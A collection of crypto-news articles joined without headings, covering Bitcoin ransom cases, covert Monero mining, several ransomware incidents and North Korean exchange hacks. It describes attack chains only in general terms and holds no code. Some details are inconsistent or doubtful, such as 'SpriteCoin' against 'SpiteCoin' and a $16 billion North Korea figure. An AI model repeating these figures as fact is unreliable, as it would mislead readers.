Mexican Youtuber Arrested Over Bitcoin Ransom Kidnap

A motivational Youtuber from Mexico has been arrested over the alleged kidnapping of Thania Denisse, a 33-year-old lawyer. Germán Loera is thought to have led a gang of five to kidnap the woman. The group are also reported to have demanded the ransom be paid in Bitcoin.

Kidnapper has Scant History of Bitcoin Involvement

Loera has been an active Youtuber creating various motivational and self-help videos. These were relatively unknown until the 23-year-old was reported to be connected with the kidnapping. Naturally, his hits have increased rapidly since then. Local news source El Pais report the Chihuahua public prosecutor assigned to the case as stating:

“According to the investigation, the leader of the gang is Germán Abraham L. A., who has several videos on the internet as a Youtuber.”

The young internet personality is currently being held in custody and awaiting trial. Whilst he has no prior convictions, local media have hinted at a potential motive. Following the arrest, outlets reported that Loera’s father was recently murdered by a group of organised criminals. This has later been confirmed by the public prosecutor although there has been no explicit link made between the kidnapping and the murder yet.

There are also no real previous connections between Loera and Bitcoin. The only clue might lie in a Tweet to Bitso, one of the first Mexican cryptocurrency exchanges. The Tweet read:

 “I’d like to speak to you. We are the heads of marketing for the biggest bitcoin casinos in the world.”

The message did not receive a public reply, however. It seems likely therefore that the decision to accept Bitcoin as a ransom was done because of its pseudonymous qualities and the general misconception that Bitcoin transactions cannot be traced, rather than something deeper.

Since the story broke, comments on social media have been particularly scathing to the accused kidnapper. Some of called him a “delinquent” or a “liar” because of the hypocrisy of his self-help videos. Meanwhile, others have called for him to be executed by the state – despite the fact that the death penalty does not exist in Mexico.

The case of Loera is not the first time a kidnap ransom has been demanded in Bitcoin. Late last year we reported on a crypto-analyst at UK cryptocurrency exchange EXMO being kidnapped in Ukraine. The exchange ended up paying over $1 million for Pavel Lerner’s release.

Meanwhile, Bitcoin is continuing to be used by cybercriminals as a tool in ransomware attacks. These “digital kidnappings” involve the locking of data on infected machines. Hackers then demand a payment is made in Bitcoin for the information’s release. Last year, the WannaCry attack is thought to have infected over 200,000 computers in 150 countries.

Subscribe to our newsletter

Several things have come together in a perfect storm to create the most recent crypto-crime trend: the ability to surreptitiously install illicit Monero miners on unsuspecting computers around the world. Windows servers, laptops, Android devices, and IoT connected devices are all at risk.

The worst part? Targets often are unaware that they’ve been hacked — unless they’re able to recognize an occasional performance slowdown or can closely monitor their electric use. No ransoms, no stolen passwords or personal information; victims may even find it difficult to convince anyone there’s a problem.

Perfect Storm

  1. In 2017 a hacker group released a National Security Agency-created hack called EternalBlue, which made it easy to crack into computers running Microsoft Windows.
  2. Cryptomining itself: the fact that blockchain-based systems utilize miners, who automatically receive a cryptocurrency payment/reward for their contribution in whatever coin they choose to process.
  3. Cryptocurrency users looking for more anonymity than offered with Bitcoin developed Monero, an altcoin better able to hide the tracks of criminal transactions.

Under the Radar

Cryptomining is both profitable and easy (enough) to mount. As a result, it is rapidly replacing ransomware as the crypto-related cybercrime of choice, especially as cybersecurity vendors are bringing ransomware protection to market. The combination of the above technologies has created what is essentially a perfect storm, threatening to wreak havoc on computer systems.

“What we’re looking at from a near and potentially long-term perspective is the value of a computer that has just a regular old CPU might be more just leaving it quietly running some cryptocurrency miner rather than infecting it with ransomware or some other software that might steal data,” explains Ryan Olson, Intelligence Director at Palo Alto Networks.

“In this new business model, attackers are no longer penalizing victims for opening an attachment or running a malicious script by taking systems hostage and demanding a ransom,” explain the Talos team. “Now attackers are actively leveraging the resources of infected systems for cryptocurrency mining.”


A large number of compromised devices working together is known as a botnet. Botnets are a common component of a hacker’s toolbox, as they can mount distributed denial of service attacks and various other attacks that require massive amounts of coordinated transaction processing.

In the case of illicit cryptomining, however, each node works independently of the others. Cyber-criminals simply need to install many separate (but connected) miners because each miner only generates a relatively small amount of cryptocurrency.

Case in point: Smominru. Smominru leverages the EternalBlue exploit from the NSA, targeting Windows. The attacker typically mounts a phishing attack with a Microsoft Word file attachment. Once the target downloads the file, it runs a Word macro that executes a Visual Basic script that in turn runs a Microsoft PowerShell script that downloads and installs the miner executable.


One of the main cryptocurrencies that makes this whole process work is the newly-developed anonymous cryptocurrency Monero. “Bitcoin alternatives like Monero and Ethereum continue their overall upward trend in value,” explains Sandiford Oliver, Cybersecurity Researcher for Proofpoint, “Putting them squarely in the crosshairs of threat actors looking for quick profits and anonymous transactions.”

While other cryptocurrencies do have their own roles, Monero is shaping up to be the favorite. “This Monero mining botnet is extremely large, made up mostly of Microsoft Windows servers spread around the globe,” says Kevin Epstein, Vice President of Proofpoint’s Threat Operations Center.

Employees at the Colorado Department of Transportation (CDOT) spent the second day offline today, while security officials — including the FBI — continue to investigate a ransomware virus that hijacked computer files and demanded payment in Bitcoin for their return.

According to Amy Ford, a CDOT spokeswoman, only employee computers running Windows and equipped with McAfee security software were impacted.

“No one is back online. What we’re doing is working offline. All our critical services are still online — cameras, variable message boards, CoTrip, alerts on traffic. They are running on separate systems,” Ford said. “The message I’m sharing [with employees] is CDOT operated for a long time without computers so we’ll use pen and paper.”


The ordeal began on Wednesday morning when CDOT shut down more than 2,000 employee computers and began investigating the attack. The malicious code was a variant of ransomware called SamSam, according to Brandi Simmons of the Governor’s Office of Information Technology (OIT). Later in the day, in attempts to prevent further damage, McAfee, the security software used by the CDOT computers, provided a software patch to stop the execution of the ransomware.

“This ransomware virus was a variant and the state worked with its antivirus software provider to implement a fix today. The state has robust backup and security tools and has no intention of paying ransomware. Teams will continue to monitor the situation closely and will be working into the night,” said OIT chief technology officer David McCurdy in a statement.

The OIT, which reached out to the FBI for assistance, are still investigating the attack and have not paid a cent to attackers — nor do they plan to according to Simmons:

“No payments have been made or will be made. We are still investigating to see whether or not files were damaged or recovered,” she said in an email.

As noted, the ransomware was a variant of SamSam, which last made headlines in January after targeting the healthcare industry. It encrypted files and renamed them “I’m sorry,” according to a report by security firm TrendMicro. One hospital in Indiana, Hancock Health, paid $55,000 to get its files back. To make things worse, a growing problem is that paying cyber-jackers in itself isn’t always easy— sometimes other hackers hijack the ransom payments before they are received and redirect them into their own cryptocurrency wallets.

These remote hacks are becoming more and more common — just last week Elon Musk’s cloud was hacked. In this case, though, the cyber-attackers didn’t steal information: They used his computer system’s power to mine cryptocurrencies, deeming it more profitable than extracting files and demanding ransom.  

Ransomware distributors and other cybercriminals expecting an easy payday are having their illicitly obtained “earnings” stolen by likeminded individuals, who are hijacking the ransom payments before they are received and redirecting them into their own cryptocurrency wallets. At first glance, this may not seem like a huge problem — attackers getting a taste of their own medicine in becoming victims of cyber-theft themselves. But these attacks are also preventing ransomware victims from unlocking their encrypted files, because, as far as those distributing the malware are concerned, they never received their ransom payment.

Ransomware is a huge problem for internet users across the globe. It’s a form of malicious software —malware — which encrypts documents on a computer or across a network. Victims can often only regain access to their encrypted files and/or networks by paying a ransom to the criminals behind the ransomware. 

Uncovered by researchers at Proofpoint, this scheme is believed to be the first of its kind. So how are these attacks actually happening? Cybercriminals are using a Tor proxy browser (Tor is a web browser designed for anonymous web surfing) to carry out middle-man attacks, stealing the cryptocurrency payments the victims of ransomware are attempting to send to their attackers.

The attacks take advantage of the way ransomware distributors have victims use Tor to buy the cryptocurrency they need to make the ransom payment. While many ransomware notes provide instructions on how to download and run the Tor browser, others provide links to a Tor proxy, regular websites that translate Tor traffic into normal web traffic (so the process of paying is as straightforward as possible for the victim).

What’s been happening is one of the Tor gateways being used is altering cryptocurrency wallet addresses in the proxy, and redirecting the payment into other accounts, rather than those of the ransomware attacker. Proofpoint researchers uncovered that the proxy can redirect payments made by victims of several forms of ransomware, including LockeR, GlobeImposter, and Sigma.

As noted above, the victims, like the state of Alabama, are the ultimate losers in this scenario. Not only are they paying thousands of dollars in ransom demands, they’re not even getting their files back. These middle-man attacks mean the ransomware distributors don’t get the funds they demand from the victims and therefore don’t help said victims unlock their encrypted files.

Cyber researchers at Fortinet have managed to unearth a cryptocurrency app that is actually a ransomware in disguise.

The cybersecurity firm, in its report, indicated SpriteCoin app to be a new kind of ransomware technique. It poses as a “sure-to-be-profitable” cryptocurrency, prompts targets into installing it for profits, and encrypts their files. The ransomware asks 0.3 units of Monero (~$100) to counterbalance the attack with a decryption key. But once the targets pay the sum, they further get harassed by receiving more malware attacks.

SpiteCoin seems to have an embedded SQLite engine. The revelation has led researchers to believe that the database management system is being used to store harvested credentials. The Fortinet report explains:

“The ransomware first looks to harvest Chrome credentials, and if it finds nothing it then moves on and tries to access the Firefox credential store. It then looks for specific files to encrypt. These files are then encrypted with [a] .encrypted file extension.”

In simple words, the passwords stored in target’s Chrome or/and FireFox are sent to remote servers, where they are likely to be accessed by the attackers for every wrong purpose.

Social Engineering to Lure Targets

SpriteCoin is the one-of-the-first kind of malware attacks which is delivered in the form of a cryptocurrency wallet. The traditional ransomware techniques, on the other hand, rely on phishing websites and emails. But the underlying technique of every ransomware remains the same: social engineering.

It is to be noted that every ransomware out there pretends to offer something ridiculously attractive in return for some confidential information/file download. These messages may contain a compelling story and context – a cliffhanger – to make you either click on the attached links or files. It is always recommended to follow a think-first-act-later policy.

Bitcoin Losing Steam in Ransomware Department

The SpriteCoin ransomware also proves reports indicating the hackers’ depreciating interest in demanding payments labeled in Bitcoin. Just recently, a California-based enterprise cybersecurity firm noted a steep 73% decline in the Bitcoin ransomware demands. Synchronically, it was assumed that hackers will choose a local fiat or an alternative cryptocurrency over the Nakamoto’s brainchild.

China is a country where cryptocurrencies are frowned upon. This is for many different reasons, including disturbing the financial ecosystem. However, there is another big threat most people seem to be unaware of right now. A lot of new Bitcoin-related scams have appeared out of nowhere. These are the findings of Kroll, a global risk management firm. At this rate, it is highly unlikely China will ever soften its stance on cryptocurrency.

The findings by global risk management firm Kroll paint a worrisome future. China is home to a lot of Bitcoin-related scams as of right now. Given the government’s negative stance toward cryptocurrencies, that is a bit of a surprise. At the same time, this is also part of a growing fraud threat in the country. More specifically, close to 90% of all Chinese companies faced some form of cybercrime in 2017. This is an extremely worrisome trend, and it’s unsurprising Bitcoin plays a role in all of this.

China Falls Victim to More Cybercrime

More specifically, the country is in the process of adopting new technologies. With every new generation of innovation come additional security risks. Innovations make the consumers’ daily lives more convenient, but they also bear risks. As such, we see more and more cyber fraud and scams in the Chinese market right now. Cybercriminals are targeting people who have an interest in Bitcoin for quite some time now. This report seems to indicate that trend will only continue for quite some time to come.

For the time being, it is a bit unclear how people in China are defrauded for Bitcoin exactly. The most common cyber threats include viruses, phishing, and data breaches. Data deletion, wire transfer fraud, and ransomware are all in the lower segments as of right now. This seems to indicate the role of Bitcoin is a lot less prominent than most people might expect at this time.  Since the report is not too clear on this front, Bitcoin’s role remains unclear for the time being.

One thing is certain: Chinese companies need to step up their game. A lot of companies have increased fraud awareness as we speak. However, there is still room for future improvements. Especially when it comes to conducting proper background checks, things can certainly improve a lot. Hiring the right people to take care of these problems is the top priority right now. Most of the cyber threats can be avoided with common sense as well.

Cybercrime experts are attributing the most recent Bitcoin heist to North Korea. The Wall Street Journal report that the South Korean cryptocurrency exchange YouBit is the latest victim of a malicious hacking, and that their northern neighbours are to blame. YouBit have been forced to declare themselves bankrupt after 17 percent of their digital assets were stolen. They are allowing customers to immediately withdraw three quarters of the funds in their accounts. The remaining sums will be paid out following the liquidation of the exchange.

The allegations come just one day after the US laid the blame for the WannaCry cryptographic worm attack on North Korea. ARS Technica report that White House National Security Adviser Tom Bossert stated yesterday:

“We do not make this allegation lightly. It is based on evidence. We are not alone with our findings, either. Other governments and private companies agree. The United Kingdom attributes the attack to North Korea, and Microsoft traced the attack to cyber affiliates of the North Korean government.”

The WannaCry ransomware attack targeted users of the Windows operating system this Spring. It’s estimated to have infected over 300,000 computers across the globe. Computers and their contents were frozen and a demand of Bitcoin was then made to those affected.

These examples are not the first time that the communist dictatorship of North Korea have been implicated in such heists. Just this year, three additional attacks have been made against South Korean exchanges that are being blamed on operatives working under Kim Jong Un. The largest of which was on Yapizon, YouBit’s predecessor. They were compromised back in April. This digital heist saw even larger sums of cryptocurrency lifted.

A report issued back in September by cyber security firm FireEye acknowledged the motive behind North Korea’s interest in digital currency. The fact that cryptocurrencies offer permission-less movement of funds across the planet makes them ideal for the purpose of laundering money and evading sanctions. Hackers can then use coin tumbling services to “clean” funds. Alternatively, they can exchange Bitcoin involved in a hack for a much less traceable currency like the anonymity coin Monero. It’s believed that this is what occurred following the WannaCry outbreak.

For a country trying to fight off aggressive international sanctions and continue their militarisation, cryptocurrency seems to present an obvious solution to traditional financial channels being closed off to them. ARS Technica estimate that some $16 billion have been lifted by North Korea to finance their foreign policy objectives. Whilst this is pittance when compared with the over $612 billion market cap of all of cryptocurrency, for a nation that are currently in the midst of economic strangulation, it’s certainly worth going after.


Image: PixaBay




In response to a spate of hackings, some law firms have made the decision to preemptively open Bitcoin wallets to pay their attackers. John Sweeney, president of IT and cyber security advisory company LogicForce claimed that accounts would be used to settle ransoms as a “last resort” and the measure should be part of a wider contingency plan.

For Sweeney, the decision is proactive rather than reactive. However, what exactly is proactive about waiting to get hacked and then paying a ransom is unclear. There aren’t even any guarantees that the criminals will release the breached data following settlement of demands. According to the cyber security expert himself, it has taken some firms months and multiple ransoms to even recover data from hackers. Even then, the data may already be compromised, rendering confidentiality agreements between clients and companies useless and potentially exposing sensitive details.

The latest security breach was announced earlier today. An offshore law firm catering to super-rich clients was hacked by a criminal group. Those served by Appleby in Bermuda will be awaiting the criminals’ next move which likely be either blackmail or straight up exposure. This highlights a major issue with law firms’ security which Sweeney says needs to be tackled. Data is often sent via unencrypted emails and thus risks being breached by any hacker savvy enough to get around the often-scant security procedures in place. Certain data obtained via such a practice is understandably extremely valuable to the parties concerned. Sweeney commented about the growing trend within the industry:

We are predicting there are going to be more sophisticated attempts to intrude at firms that work with highly visible clients whose IP or business information is extremely valuable.

Exacerbating the problem is the fact that cyber-criminals’ can often cover their own tracks impeccably. This makes it unlikely that they’ll be caught and for Sweeney, it represents a risk/reward proposition that’s “totally in the cyber criminals’ favour.”

However, the decision to announce that some firms will have a digital wallet loaded with funds to pay off hackers seems to do little else than paint a huge target on the law industry. Clearly, by having the money ready, the implication is that firms are willing to settle ransoms, leaving them further exposed. Sweeney does however urge firms to do more to enhance their security and eliminate potential online attack vectors. There are no shortage of funds within the law industry, so in reality, there is no excuse for not employing the most up-to-date encryption techniques for sensitive data, as well as suitable backup solutions. Prevention, as they say, is much better than cure.

Yet another incident of hackers using Bitcoin as a payment method for ransomware attacks has surfaced. One of the largest counties in Alabama was the victims this time, and the security breach and subsequent encrypting of sensitive information cost the local government a not-inconsequential $37,000.

The figure sounds a lot, but when you consider that County Commission Chairman Elton Dean estimates the value of the seized data at around $5 million, the legislature managed to reclaim the appropriated digital property for an absolute bargain. He also called the attack an “emergency situation,” a comment which probably made the hackers wish they’d asked for a greater sum of money.

The county paid the ransom on Friday after an emergency meeting was held by the Montgomery County Commission to authorize the cash to send to the cybercriminals. At the current market value of a Bitcoin, the security breach cost them just over 9BTC according to local news sources.

Hannah Hawk, a spokesperson for Montgomery County said that the attack “locked up” the county’s data using encryption methods. This prevented the necessary departments from accessing various pieces of sensitive information. Data ranged from vehicle tags to business and marriage licenses. Hawk also reminded officials and the public that no personal information had actually been stolen. This is because the hackers had charged the county for a key for the decryption of data, and therefore never actually had access to the information themselves.

Following the attack, the county had been working alongside the FBI to restore data from backups, but “issues” with the files had forced them to cede to demands. However, the federal investigators did not condone the payment of ransom, claiming that payment does not guarantee the delivery of files.

There have been cases where organisations never got a decryption key after having paid the ransom. Paying a ransom not only emboldens current cyber criminals to target more organisations, it also offers an incentive for other criminals to get involved in this type of illegal activity. And by paying a ransom, an organisation might inadvertently be funding other illicit activity

Despite these warnings, the chief IT officer for Montgomery County, AL, did confirm that those targeting the local government with ransomware had indeed restored all the data and that no sensitive information had been compromised. How exactly they were able to ensure that a copy of all the sensitive information was not made to sell on the black market, thus further increasing the revenue generated from the scam, we’re not quite sure. However, Lou Ialacci seemed adamant this was the case:

“I hate to say this, but their reputation is that they do return stuff. They think of themselves as modern day Robin Hoods, they are here helping the masses. They are the good guys, they are going to come in, hack you and grab the files. If you pay them, that’s your punishment for letting them in.”

Despite these recent developments, the guidelines to deal with ransomware attacks remain the same. It is advisable not to pay ransom to the perpetrators as there is no guarantee that they will provide the decryption key after receiving funds. Meanwhile, good internet usage practices and creating regular backups of sensitive data will help users avoid being held to ransom by cybercriminals.

Ref: WSFA 

Bitcoin and cryptocurrency have often been associated with ransomware over the past few months. Most types of malware effectively demand a payment in BTC before files are restored. nRansom proves to be a very different creature, as it has no interest in cryptocurrency whatsoever. That is good news for the industry, but the new payment method is even stranger. Victims are asked to send at least 10 different naked pictures to the criminals.

It is evident cybercriminals are getting weirder when it comes to ransomware infections. nRansom is one of the oddest creations we have come across to date. While it’s good to see there is no demand for Bitcoin, asking for nude pictures is pretty offensive. It is unclear where this sudden change comes from, though. Bitcoin has been a preferred payment method for ransomware developers over the past two to three years.

nRansom is a Creepy Type of Ransomware

What is even creepier about nRansom is the reference to Thomas the Tank Engine. It is displayed as your computer’s wallpaper once you are infected with this malicious software. The combination of demanding naked pictures and a picture of Thomas will creep a lot of people out. Luckily, it does not appear this type of malware is spread on a large scale just yet. It is a very disturbing type of ransomware, that much is certain.

However, this malware is a legitimate threat to anyone who gets infected by it. It is officially recognized as a malicious software package by most antivirus engines right now. Plus, it appears there may be some other variations of the same ransomware floating around the world wide web as we speak. No one knows for sure how it is distributed right now, though. Given few samples spotted so far, it doesn’t appear distribution of this malware is a priority right now.

All of this goes to show cybercriminals come in many different forms and shapes. Most of them do it for fame and money. Others are far more perverted in nature, that much is rather obvious. Anyone infected with nRansom should never meet the demands of the criminals. That goes for any type of ransomware, but this one in particular right now. It will be interesting to see if nRansom will effectively become a big threat or not. For now, it doesn’t look like it, but things can change at any time.